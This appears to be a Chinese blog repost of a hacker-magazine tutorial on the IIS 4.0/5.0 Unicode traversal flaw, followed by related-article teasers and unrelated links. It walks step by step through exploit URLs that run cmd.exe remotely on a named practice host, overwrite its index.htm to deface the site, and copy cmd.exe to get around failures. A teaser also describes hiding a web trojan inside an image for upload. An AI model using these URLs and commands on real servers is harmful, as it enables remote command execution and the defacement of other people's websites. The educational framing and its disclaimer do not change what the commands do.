IIS漏洞入侵

Web中间件漏洞IIS IISInternet Information Services 的缩写,意为互联网信息服务,是由微软公司提供的基于运行 Microsoft Windows 的互联网基本服务。最初是 Windows NT 版本的可选包,随后内置在 Windows 2000 、Windows XP Professional 和 Windows Server 2003 一起发行,但在 Windows XP Home 版本上并没有 IIS 阅读详情
硬功夫栏目
《黑客营》网站:http://cpcw.com
《黑客营》论坛:http://cpcw.com/bbs
感谢中国网管联盟提供支持(www.BitsCN.com)
为了满足广大读者的要求,本报《硬功夫》栏目再次与大家见面了。
本次我们为你准备了八期的黑客系列选题,旨在带领大家完成对一些主流技术提升,我们会详细地介绍新近阶段最火热的黑客事件,并对它的攻击技术进行分析解说。
为了便于读者研究和学习,我们为大家提供了一台服务器作为模拟的攻击环境,只要你按照我们的分析步骤操作,就可以体验全新的黑客旅程,享受黑客的激情与兴奋。
让我们充分发挥互动力量,赶快进入我们的互动频道。
编辑提醒:由于本系列以攻击实例为主,所以请广大读者严以自律,仅作技术研究,不得用于非法行为。

IIS漏洞入侵
特约作者:木木
本期任务:成功入侵栏目提供的服务器,并替换网站aa.feedom.net的首页。

IIS(Internet Information Server)作为当今流行的Web服务器之一,提供了强大的Internet和Intranet服务功能。IIS主要通过端口80来完成操作,具有很大的威胁性,因为作为网络服务器80端口总要打开的。一直以来攻击IIS服务是黑客常用惯用的手段,那年中美撞击事件后出现的中美黑客双方的攻击就频繁用到了IIS漏洞进行入侵的个案,这种情况现在还依然存在,只怪公司企业领导以及网管同志们对这些安全问题太不关注的原因造成的。


一、漏洞说明
针对IIS的攻击方式可以说是五花八门,使用大量的数据请求,使IIS超负荷而停止工作,是初级黑客的必修课程。不过鉴于篇幅不对IIS的攻击做详细介绍,而是说说入侵IIS。IIS有十多种常见漏洞,但利用最多的莫过于Unicode解析错误漏洞。微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。我们今天就着重来讲讲这个。

二、UNICODE漏洞的原理
很久以前发现IIS 4.0和IIS 5.0在UNICODE字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含UNICODE字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些Web根目录以外的文件和程序。
对于IIS 5.0/4.0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如"%c1%hh"或者"%c0%hh",它会首先将其解码变成:0xc10xhh, 然后尝试打开这个文件,Windows系统认为0xc10xhh可能是UNICODE编码,因此它会首先将其解码,如果 0x00<= %hh < 0x40的话,采用的解码的格式与下面的格式类似:
%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh
%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh
因此,利用这种编码,我们可以构造很多字符,例如:
%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '/'
攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。
此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 中国台湾繁体中文也同样存在这样的漏洞。
在NT4中/编码为%c1%9c
在英文版里: WIN2000英文版%c0%af
在中文win2k里:%c1%1c
此外还有多种编码,不一一阐述。
本文例子均以win2k为准,其他类型请自行替换。

三、判断漏洞是否存在
如何判断漏洞是否存在,有一种方法就是找出一款该漏洞的扫描器来进行扫描。我们知道,扫描并不是一个真正的黑客攻击行为,它只是一种寻找入口的方式。IIS的Unicode漏洞扫描器有很多,如“RangeScan”或者是“unicodeScan”都可以进行扫描以收集服务器信息。还有些综合性的扫描软件除了能发现unicode漏洞之外,同时也会收集服务器的其它漏洞。这儿我们提供了一款远近闻名的扫描器[X-Scan]供大家下载试手:
下载地址:http://bitscn.com/upload/X-Scan-v3.1-cn.rar
我们也可在IE浏览器里输入以下语句来进行判断:
http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub/目录不和winnt同盘,或者目录级数有改动,可能会引起请求失败。
如果存在漏洞,那么在浏览区可看到如下类似信息:
Directory of C:/inetpub/scripts
2005-03-05 15:49 〈DIR〉 .
2005-09-05 15:49 〈DIR〉 ..
是不是有自己机器的感觉了,正点!就是这种感觉!
cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!
大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,会dos的朋友一定懂其意义了,不懂的请去看书。
不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!

四、修改网站首页
步骤一:确定网站首页名称
一般默认首页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个,我们可以通过测试来确定首页名称:
http://aa.feedom.net/index.html
http://aa.feedom.net/default.asp
http://aa.feedom.net/index.htm
通过上面三个网址的测试,很快我们发现只有第三个网址可以打开正常,说明这个网站的首页名称为index.htm。
步骤二:原理说明
好了那么我们就修改它吧!
最方便的方法:echo法:echo是一个系统命令,主要用于设置回应开关。
echo test >c:/autoexe.bat就是把test加入autoexec.bat里并删除原有内容
echo timedate >>c:/autoexec.bat就是加入timedate但不删除原有内容
明白了吗?接下来我们就可以逍遥的改了。
步骤三:更改网站首页
http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+ HaHaThisismyhack +>c:/inetpub/wwwroot/index.htm
IE浏览器返回来的结果可能为以下两种情况之一:
1.HTTP 500 - 内部服务器错误
2.The parameter is incorrect.
通过返回信息的提示以及我们对cmd的分析得出,可能是命令语句中参数错误,加入"符号再试试
1. http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+ HaHaThisismyhack +>c:/inetpub/wwwroot/index.htm
这条命令表示把HaHaThisismyhack加入到index.htm文件并删除原有内容
2.http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+ by2005-3-9+>>c:/inetpub/wwwroot/index.htm
这条命令表示把by2005-3-9加入到index.htm文件中,但不删除原来内容
如果正常,上面两条语句的回应应该都为cgi错误,这表示语句执行成功了:)系统只是程序性报个错误,不用理会.
现在我们再来打开网站aa.feedom.net看看吧,^-^ 怎么样了,哈哈是不是被你改掉了?不错吧,而在实际操作中,可能这个方法也会失效,这时,我们就可以copy cmd.exe 为另一个exe,记住路径,用copy后的来echo 例如:
http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:/a.exe
http://aa.feedom.net/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:/inetpub/wwwroot/index.htm

四、总结
上面的内容都很简单,很适合初学者,还望高手们不要见笑。但这只是IIS漏洞的开始,想要进阶就必须掌握原理及基础。
利用web漏洞入侵网站并控制服务器、Web漏洞原理与利用 经过本次实验,我深刻了解了网络无安全这句话,了解了端口扫描和漏洞扫描,并掌握了多种软件的使用,掌握了端口及漏洞扫描的一些基本知识,掌握一些网络入侵的基本流程,并且让我可以了解到远程主机所存在的一些问题。2、选择Options-Configuration命令,此时打开Options对话框,在这里可以设置扫描属性,包括扫描时延、线程优先级、线程数量、扫描IP/Port列表设置等选项。应用池程序 --defaultapppool--高级设置--常规--启用32位应用程序--True。 阅读详情

相关推荐

IIS7&7.5解析漏洞

IIS7/7.5在Fast-CGI运行模式下,在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。

笨笨的专栏 5万+

IIS漏洞入侵原理介绍 IIS漏洞如何入侵

<br />IIS漏洞入侵原理介绍 IIS漏洞如何入侵<br />IISInternet Information Server)服务为Web服务器提供了强大的Internet和Intranet服务功能。主要通过端口80来完成操作,因为作为Web服务器,80端口总要打开,具有很大的威胁性。长期以来攻击IIS服务是黑客惯用的手段,笔者记得有段时间两大黑客组织对攻就频繁地用到了IIS漏洞入侵。这种情况现在还依然存在,多是由于企业管理者或网管对安全问题关注不够造成的。 <br />Unicode漏洞 <br />

DavidInternet的专栏 8020

等时替代模型( Isotemporal Substitution Model)

文献阅读:Associations of sedentary time and physical activity with adverse health conditions: Outcome-wide analyses using isotemporal substitution model(该论文于2022年4月28日发表在柳叶刀子刊 EClinicalMedicine 上)

姚巨龙的博客 1万+

IIS漏洞(防范黑客技术)

自2007年下半年开始,关于IIS漏洞层出不穷,鉴于目前IIS的广泛使用,觉得有必要把收集的资料加以总结一下。   1.介绍   这里介绍的方法主要通过端口80来完成操作,具有很大的威胁性,因为作为网络服务器80端口总要打开的。如果想方便一些,下载一些WWW、CGI扫描器来辅助检查。   而且要知道目标机器运行的是何种服务程序,你可以使用以下命令:   telnet 《目标机》 80 ...

liuyidang的专栏 1161

报道称黑客利用微软IIS安全漏洞 入侵大学服务器

微软的网络资讯服务(IIS)一出现安全漏洞,没多久黑客就利用漏洞发动零日攻击。 印第安纳州博尔州立大学(Ball State University)向The Register透露,该校执行IIS程序的服务器在周一遭到黑客入侵,同日微软才提醒社会大众注意这个安全漏洞。 根据The Register周三报道,学生们周一访问自己的iWeb网页时,就看到系统遭到黑客入侵的信息。这不表示资料遭窃或被载入恶...

weixin_33804582的博客 173

利用IIS日志追查网站入侵

原件下载地址:http://www.cnbct.org/IISLOG.doc     以前黑站黑了很多,但是就没有想过会不会被追踪到,都没有想过怎么去擦自己的屁股,万万没想到在自己不再黑站的时候,却发现了自己的BBS被黑了。根据当初的判断,BBS程序是我们BCT小组成员编写的Lvbbs不会存在着上传漏洞和SQL注入啊!就算能拿到权限都不可能可以弄出个webshell出来,不是程序的漏洞的话,

动性忍心 1001

浅谈黑客入侵的4条途径

孙子兵法上说,知己知彼,百战不殆。要想有效的防范黑客对我们电脑的入侵和破坏,仅仅被动的安装防火墙是显然不够的,我们更应该了解一些常见的黑客入侵手法,针对不同的方法采取不同的措施,做到有的放矢。木马也许是广大电脑爱好者最深恶痛绝的东东了,相信不少朋友都受到过它的骚扰。木马有可能是黑客在已经获取我们操作系统可写权限的前提下,由黑客上传的(例如下面会提到的ipc$共享入侵);也可能是我们浏览了一些垃圾个人站点而通过网页浏览感染的(利用了IE漏洞);

VN520的博客 836

windows 2003 IIS漏洞复现

新建网站的具体步骤如下:我们得到一个网站,地址为win 2003的ip地址。​可以访问到自建的网站​将ip地址赋予相应的域名,即通过test12138.com也能搜索到网站。在本机的host文件中修改,使得ip地址和域名对应,那么这两种方式都能进入本网站。在cmd命令中运行nslookup test12138.com验证DNS解析是否成功,即,IP地址和域名是否对应。存在问题:以下结论还无法通过实验体现,并且修改域名不成功,无法通过域名访问网站。

weixin_45440497的博客 495

利用IIS日志追查网站入侵者(1)

 以前黑站黑了很多,但是就没有想过会不会被追踪到,都没有想过怎么去擦自己的屁股,万万没想到在自己不再黑站的时候,却发现了自己的BBS被黑了。根据当初的判断,BBS程序是我们BCT小组成员编写的Lvbbs不会存在着上传漏洞和SQL注入啊!就算能拿到权限都不可能可以弄出个webshell出来,不是程序的漏洞的话,就一定是服务器的安全问题了。以前整天拿着旁注去黑站,这下子好玩了,竟然被别人拿去黑自己的网

天外飞仙的专栏 1142

通过IIS日志来检测入侵实例

通过IIS日志来检测入侵实例网站服务器对于网络成员的的信息共享提供了大大的方便,同时也带来了很多安全隐患,妥善的使用和管理网络资源成为了网络管理员的面临的严峻的考验。面对网络入侵者使用各种以知漏洞对网站服务器进行攻击,分析和防范网络入侵者的行为则成为解决网络安全问题的一个重要手段。微软的服务器系统Microsoft Internet Information Server (IIS)提供了一套相

天外飞仙的专栏 1956

渗透记录——iis7.5漏洞没有iis6的解析漏洞

拿到一个后台,刚开始不让传马,apsx伪装成jpg,提示安全错误,含有html编码,看来必须要用正常图片。于是找了小图片,用copy /b d:\aa.jpg+d:\xiaoma.aspx  luo2.jpg  ,如图 合成了一个含马的正常图片(注意顺序:图片+马是修改文件头,马+图片是修改图片尾)直接修改了文件头,发现可以上传。开心呀,于是就花式作死,各种尝试改后缀……

baidu_33260220的博客 1万+

IIS服务器IIS服务器常见漏洞

文件解析漏洞 1、目录解析漏洞 2、文件名解析漏洞 3、畸形解析漏洞 IIS 短文件漏洞 PUT 任意文件写入 IISInternet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。 IIS目前只适用于Windows系统,不适用于其他操作系统。 文件解析漏洞 1、目录解析漏洞IIS5.x/6.0 中,默认会将**.asp(*.asa、*.cer、*.cdx )目录下的.

时乙的博客 4831

IIS 漏洞总结

目录 IIS介绍 IIS6.0 版本 目录解析漏洞 文件名解析漏洞 远程代码执行漏洞 cve_2017_7269 漏洞描述 POC 说明 漏洞利用 IIS7.5版本 IIS解析漏洞 漏洞原理 实验环境搭建 漏洞复现 IIS介绍 iisInternet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务 IIS6.0 版本 目录解析漏洞 对于名字为.asp后缀的文...

星落的博客 4459

Linux 服务器从零部署 kkFileView 完全指南(Docker 方案)

本文详解Linux环境下使用Docker从零部署kkFileView的完整流程,涵盖环境准备、Docker安装、容器运行、中文字体配置、Nginx反向代理、安全加固、性能调优及业务对接等关键环节,并提供一键部署脚本与常见问题排查方案,助力生产环境稳定落地文件在线预览服务。

小李同学的博客 424

SSH 公钥认证配置指南:从生成密钥到配置 SFTP 服务器

生成:在 Windows 上用 PuTTYgen 生成密钥对部署:将公钥部署到 SFTP 服务器的应用:修改 WinSCP 脚本使用私钥认证验证:测试免密登录是否成功无需人工干预自动运行不再需要明文保存密码享受更高的安全性。

qq_27361945的博客 246

【Linux】C++ 实现可扩展 TCP 服务器|回响、字典、远程命令

客户端输入什么内容,最后就能在收到的结果里看到自己刚才发送的数据,以此验证服务器‑客户端通信是否正常。用 lambda 把 (远程命令业务/字典业务/回响业务)打包成回调函数,传给 TcpServer。

2301_81250340的博客 236

RocketMQ5.3.0-control-多 Master 多 Salve-异步复制-集群搭建

RocketMQ5.3.0-control-多 Master 多 Salve-异步复制-集群搭建(详细文档)

m0_52369979的博客 709

RTL8211E 以太网phy评估板ALTIUM设计硬件原理图+PCB+封装库文件.zip

RTL8211E 以太网phy评估板ALTIUM设计硬件原理图+PCB+封装库文件,硬件采用2层板,RJ45接口,大小为62*30mm,包括完整的原理图PCB及封装库文件,可做为你的学习设计参考。主要器件如下:2.5V_LDOCRYSTAL_XCOL-3Cap CapacitorConnector 40_BTB_F Plug Assembly, 40-Pin ConnectorHR911130CInductor InductorRTL8211ERes3 Resistor

上一篇: CSS层叠样式表
下一篇: 每一个软件开发人员绝对必须掌握的关于Unicode和字符集的最基础的知识
wedge
博客等级 码龄22年 5粉丝 22原创
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值